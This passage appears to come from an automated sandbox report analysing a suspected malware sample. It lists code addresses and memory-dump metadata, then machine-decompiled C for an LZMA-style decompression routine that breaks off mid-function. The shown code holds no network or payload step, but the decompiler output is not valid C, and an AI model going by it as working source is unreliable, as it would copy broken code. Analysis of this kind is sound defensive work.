                                                                      0x00000000
                                                                      0x0040648e
                                                                      0x0040648c
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004064ce
                                                                      0x004064ce
                                                                      0x004064d2
                                                                      0x00406ada
                                                                      0x00000000
                                                                      0x00406ada
                                                                      0x004064d8
                                                                      0x004064db
                                                                      0x004064de
                                                                      0x004064e2
                                                                      0x004064e5
                                                                      0x004064eb
                                                                      0x004064ed
                                                                      0x004064ed
                                                                      0x004064ed
                                                                      0x004064f0
                                                                      0x004064f3
                                                                      0x004064f3
                                                                      0x004064f9
                                                                      0x00406497
                                                                      0x00406497
                                                                      0x0040649a
                                                                      0x00000000
                                                                      0x0040649a
                                                                      0x004064fb
                                                                      0x004064fb
                                                                      0x004064fe
                                                                      0x00406501
                                                                      0x00406504
                                                                      0x00406507
                                                                      0x0040650a
                                                                      0x0040650d
                                                                      0x00406510
                                                                      0x00406513
                                                                      0x00406516
                                                                      0x00406519
                                                                      0x00406531
                                                                      0x00406534
                                                                      0x00406537
                                                                      0x0040653a
                                                                      0x0040653a
                                                                      0x0040653d
                                                                      0x00406541
                                                                      0x00406543
                                                                      0x0040651b
                                                                      0x0040651b
                                                                      0x00406523
                                                                      0x00406528
                                                                      0x0040652a
                                                                      0x0040652c
                                                                      0x0040652c
                                                                      0x00406546
                                                                      0x0040654d
                                                                      0x00406550
                                                                      0x00000000
                                                                      0x00406552
                                                                      0x00000000
                                                                      0x00406552
                                                                      0x00000000
                                                                      0x004067df
                                                                      0x004067df
                                                                      0x004067e3
                                                                      0x00406b0a
                                                                      0x00000000
                                                                      0x00406b0a
                                                                      0x004067e9
                                                                      0x004067ec
                                                                      0x004067ef
                                                                      0x004067f3
                                                                      0x004067f6
                                                                      0x004067fc
                                                                      0x004067fe
                                                                      0x004067fe
                                                                      0x004067fe
                                                                      0x00406801
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068ee
                                                                      0x004068f2
                                                                      0x00406914
                                                                      0x00406917
                                                                      0x00406921
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x004068f4
                                                                      0x004068f7
                                                                      0x004068fb
                                                                      0x004068fe
                                                                      0x004068fe
                                                                      0x00406901
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069ab
                                                                      0x004069af
                                                                      0x004069cd
                                                                      0x004069cd
                                                                      0x004069cd
                                                                      0x004069d4
                                                                      0x004069db
                                                                      0x004069e2
                                                                      0x004069e2
                                                                      0x00000000
                                                                      0x004069e2
                                                                      0x004069b1
                                                                      0x004069b4
                                                                      0x004069b7
                                                                      0x004069ba
                                                                      0x004069c1
                                                                      0x00406905
                                                                      0x00406905
                                                                      0x00406908
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a9c
                                                                      0x00406a9f
                                                                      0x004069a0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004066d6
                                                                      0x004066d8
                                                                      0x004066df
                                                                      0x004066e0
                                                                      0x004066e2
                                                                      0x004066e5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004066ed
                                                                      0x004066f0
                                                                      0x004066f3
                                                                      0x004066f5
                                                                      0x004066f7
                                                                      0x004066f7
                                                                      0x004066f8
                                                                      0x004066fb
                                                                      0x00406702
                                                                      0x00406705
                                                                      0x00406713
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069e9
                                                                      0x004069e9
                                                                      0x004069ec
                                                                      0x004069f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069f8
                                                                      0x004069f8
                                                                      0x004069fc
                                                                      0x00406b34
                                                                      0x00000000
                                                                      0x00406b34
                                                                      0x00406a02
                                                                      0x00406a05
                                                                      0x00406a08
                                                                      0x00406a0c
                                                                      0x00406a0f
                                                                      0x00406a15
                                                                      0x00406a17
                                                                      0x00406a17
                                                                      0x00406a17
                                                                      0x00406a1a
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a1d
                                                                      0x00406a20
                                                                      0x00406a20
                                                                      0x00406a24
                                                                      0x00406a84
                                                                      0x00406a87
                                                                      0x00406a8c
                                                                      0x00406a8d
                                                                      0x00406a8f
                                                                      0x00406a91
                                                                      0x00406a94
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x00000000
                                                                      0x004069a6
                                                                      0x004069a0
                                                                      0x00406a26
                                                                      0x00406a2c
                                                                      0x00406a2f
                                                                      0x00406a32
                                                                      0x00406a35
                                                                      0x00406a38
                                                                      0x00406a3b
                                                                      0x00406a3e
                                                                      0x00406a41
                                                                      0x00406a44
                                                                      0x00406a47
                                                                      0x00406a60
                                                                      0x00406a63
                                                                      0x00406a66
                                                                      0x00406a69
                                                                      0x00406a6d
                                                                      0x00406a6f
                                                                      0x00406a6f
                                                                      0x00406a70
                                                                      0x00406a73
                                                                      0x00406a49
                                                                      0x00406a49
                                                                      0x00406a51
                                                                      0x00406a56
                                                                      0x00406a58
                                                                      0x00406a5b
                                                                      0x00406a5b
                                                                      0x00406a76
                                                                      0x00406a7d
                                                                      0x00000000
                                                                      0x00406a7f
                                                                      0x00000000
                                                                      0x00406a7f
                                                                      0x00000000
                                                                      0x0040671b
                                                                      0x0040671e
                                                                      0x00406754
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406887
                                                                      0x00406887
                                                                      0x0040688a
                                                                      0x0040688c
                                                                      0x00406b16
                                                                      0x00000000
                                                                      0x00406b16
                                                                      0x00406892
                                                                      0x00406895
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040689b
                                                                      0x0040689f
                                                                      0x004068a2
                                                                      0x004068a2
                                                                      0x004068a2
                                                                      0x00000000
                                                                      0x004068a2
                                                                      0x00406720
                                                                      0x00406722
                                                                      0x00406724
                                                                      0x00406726
                                                                      0x00406729
                                                                      0x0040672a
                                                                      0x0040672c
                                                                      0x0040672e
                                                                      0x00406731
                                                                      0x00406734
                                                                      0x0040674a
                                                                      0x0040674f
                                                                      0x00406787
                                                                      0x00406787
                                                                      0x0040678b
                                                                      0x004067b7
                                                                      0x004067b9
                                                                      0x004067c0
                                                                      0x004067c3
                                                                      0x004067c6
                                                                      0x004067c6
                                                                      0x004067cb
                                                                      0x004067cb
                                                                      0x004067cd
                                                                      0x004067d0
                                                                      0x004067d7
                                                                      0x004067da
                                                                      0x00406807
                                                                      0x00406807
                                                                      0x0040680a
                                                                      0x0040680d
                                                                      0x00406881
                                                                      0x00406881
                                                                      0x00406881
                                                                      0x00000000
                                                                      0x00406881
                                                                      0x0040680f
                                                                      0x00406815
                                                                      0x00406818
                                                                      0x0040681b
                                                                      0x0040681e
                                                                      0x00406821
                                                                      0x00406824
                                                                      0x00406827
                                                                      0x0040682a
                                                                      0x0040682d
                                                                      0x00406830
                                                                      0x00406849
                                                                      0x0040684b
                                                                      0x0040684e
                                                                      0x0040684f
                                                                      0x00406852
                                                                      0x00406854
                                                                      0x00406857
                                                                      0x00406859
                                                                      0x0040685b
                                                                      0x0040685e
                                                                      0x00406860
                                                                      0x00406863
                                                                      0x00406867
                                                                      0x00406869
                                                                      0x00406869
                                                                      0x0040686a
                                                                      0x0040686d
                                                                      0x00406870
                                                                      0x00406832
                                                                      0x00406832
                                                                      0x0040683a
                                                                      0x0040683f
                                                                      0x00406841
                                                                      0x00406844
                                                                      0x00406844
                                                                      0x00406873
                                                                      0x0040687a
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00000000
                                                                      0x0040687c
                                                                      0x00000000
                                                                      0x0040687c
                                                                      0x0040687a
                                                                      0x0040678d
                                                                      0x00406790
                                                                      0x00406792
                                                                      0x00406795
                                                                      0x00406798
                                                                      0x0040679b
                                                                      0x0040679d
                                                                      0x004067a0
                                                                      0x004067a3
                                                                      0x004067a3
                                                                      0x004067a6
                                                                      0x004067a6
                                                                      0x004067a9
                                                                      0x004067b0
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00000000
                                                                      0x004067b2
                                                                      0x00000000
                                                                      0x004067b2
                                                                      0x004067b0
                                                                      0x00406736
                                                                      0x00406739
                                                                      0x0040673b
                                                                      0x0040673e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040649d
                                                                      0x0040649d
                                                                      0x004064a1
                                                                      0x00406ae6
                                                                      0x00000000
                                                                      0x00406ae6
                                                                      0x004064a7
                                                                      0x004064aa
                                                                      0x004064ad
                                                                      0x004064b0
                                                                      0x004064b3
                                                                      0x004064b6
                                                                      0x004064b9
                                                                      0x004064bb
                                                                      0x004064be
                                                                      0x004064c1
                                                                      0x004064c4
                                                                      0x004064c6
                                                                      0x004064c6
                                                                      0x004064c6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406628
                                                                      0x00406628
                                                                      0x0040662c
                                                                      0x00406af2
                                                                      0x00000000
                                                                      0x00406af2
                                                                      0x00406632
                                                                      0x00406635
                                                                      0x00406638
                                                                      0x0040663b
                                                                      0x0040663d
                                                                      0x0040663d
                                                                      0x0040663d
                                                                      0x00406640
                                                                      0x00406643
                                                                      0x00406646
                                                                      0x00406649
                                                                      0x0040664c
                                                                      0x0040664f
                                                                      0x00406650
                                                                      0x00406652
                                                                      0x00406652
                                                                      0x00406652
                                                                      0x00406655
                                                                      0x00406658
                                                                      0x0040665b
                                                                      0x0040665e
                                                                      0x0040665e
                                                                      0x0040665e
                                                                      0x00406661
                                                                      0x00406663
                                                                      0x00406663
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068a5
                                                                      0x004068a5
                                                                      0x004068a5
                                                                      0x004068a9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068af
                                                                      0x004068b2
                                                                      0x004068b5
                                                                      0x004068b8
                                                                      0x004068ba
                                                                      0x004068ba
                                                                      0x004068ba
                                                                      0x004068bd
                                                                      0x004068c0
                                                                      0x004068c3
                                                                      0x004068c6
                                                                      0x004068c9
                                                                      0x004068cc
                                                                      0x004068cd
                                                                      0x004068cf
                                                                      0x004068cf
                                                                      0x004068cf
                                                                      0x004068d2
                                                                      0x004068d5
                                                                      0x004068d8
                                                                      0x004068db
                                                                      0x004068de
                                                                      0x004068e2
                                                                      0x004068e4
                                                                      0x004068e7
                                                                      0x00000000
                                                                      0x004068e9
                                                                      0x00406666
                                                                      0x00406666
                                                                      0x00000000
                                                                      0x00406666
                                                                      0x004068e7
                                                                      0x00406b1c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040614b
                                                                      0x00406b53
                                                                      0x00406b53
                                                                      0x00000000
                                                                      0x00406b53
                                                                      0x004069a0
                                                                      0x00406927
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406679

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 52544ba4eeb4024bb91b054a352ce2e9af5c1c52a3f63a0d20291f7e24db374d
                                                                      • Instruction ID: ed3c1b2e2e9110b05ca1f1fb00e1e18bfdebd83ec129b9da7b835b7cf566ec6e
                                                                      • Opcode Fuzzy Hash: 52544ba4eeb4024bb91b054a352ce2e9af5c1c52a3f63a0d20291f7e24db374d
                                                                      • Instruction Fuzzy Hash: 7D712271E04229CFDF28CFA8C844BADBBB1FB44305F15816AD816BB281D7789996DF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004065C1 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E004065C1() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406B5B))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
